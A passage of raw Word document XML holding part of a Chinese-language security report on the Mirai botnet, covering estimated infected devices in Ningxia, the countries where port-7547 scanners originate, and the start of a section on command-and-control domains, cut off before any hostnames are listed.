          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全网潜在的可感染设备总数量在3～5百万之间</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1636557105"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 360161 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="004F5E64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F568E1" w:rsidRPr="004F5E64" w:rsidRDefault="00F568E1" w:rsidP="00F568E1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目前宁夏有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>160万IP地址，在假定全球Mirai主机分布均衡的前提下，可估算宁夏境内受感染主机约占万分之三点八，即宁夏潜在可感染设备约有1100~1900个，实际被感染数量约500个。</w:t>
      </w:r>
      <w:r w:rsidR="00667012">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过数据分析我们发现了若干个</w:t>
      </w:r>
      <w:r w:rsidR="00301030">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸主机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00110B80" w:rsidRPr="00110B80" w:rsidRDefault="00110B80" w:rsidP="00110B80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc472191669"/>
      <w:r>
        <w:t>僵尸主机分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Arbor</w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在10月26日的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告称Mirai僵尸主机多见于中国内地、香港、澳门、越南、台湾、韩国、泰国、印尼、巴西和西班牙</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-194389873"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AA0FE9" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>截止到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0FE9">
        <w:t>2016年10月23日</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0FE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360蜜罐捕捉到的Mirai主机多来有56%自于越南，巴西，中国，印度，哥伦比亚，俄罗斯</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="1552263492"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="0009519D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0009519D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="0009519D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们根据宁夏派网数据统计了11月27日19时</w:t>
      </w:r>
      <w:r w:rsidR="00ED480A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00ED480A">
        <w:t>20时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流入省口的</w:t>
      </w:r>
      <w:r w:rsidR="004F5E64">
        <w:t>7547</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描者</w:t>
      </w:r>
      <w:r w:rsidR="004F5E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Top100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现它们主要来自于</w:t>
      </w:r>
      <w:r w:rsidR="00AC4DDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>巴西(</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>伊朗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>英国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>17%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中国其他省市(</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>澳大利亚(</w:t>
      </w:r>
      <w:r>
        <w:t>8%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009519D" w:rsidRDefault="0009519D" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>土耳其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>5%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>芬兰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4DDD" w:rsidRDefault="00AC4DDD" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>巴基斯坦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="004F5E64" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>法国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F5E64" w:rsidRDefault="004F5E64" w:rsidP="00AC4DDD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>智利</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>瑞典(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>泰国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00CE5D01" w:rsidP="00CE5D01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>印度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5D01" w:rsidRDefault="00AA0FE9" w:rsidP="00AA0FE9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>60给出的数据同我们基本相同</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-777330451"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360161 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc472191670"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0061327F">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>主机</w:t>
      </w:r>
      <w:r w:rsidR="00583BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidR="00583BC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidR="00827A50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特征</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主控的域名注册非常谨慎，IP地址频繁变换，绝大多数主控在域名注册时在TLD、注册局、注册邮箱方面设置了多重障碍阻滞安全社区的进一步分析</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-639340145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 36016 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidRPr="00697F42">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="00CF21F5" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目前我们搜集到的C2</w:t>
      </w:r>
      <w:r w:rsidR="003C6ECE" w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主机名包括</w:t>
      </w:r>
      <w:r w:rsidR="003C6ECE" w:rsidRPr="00697F42">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
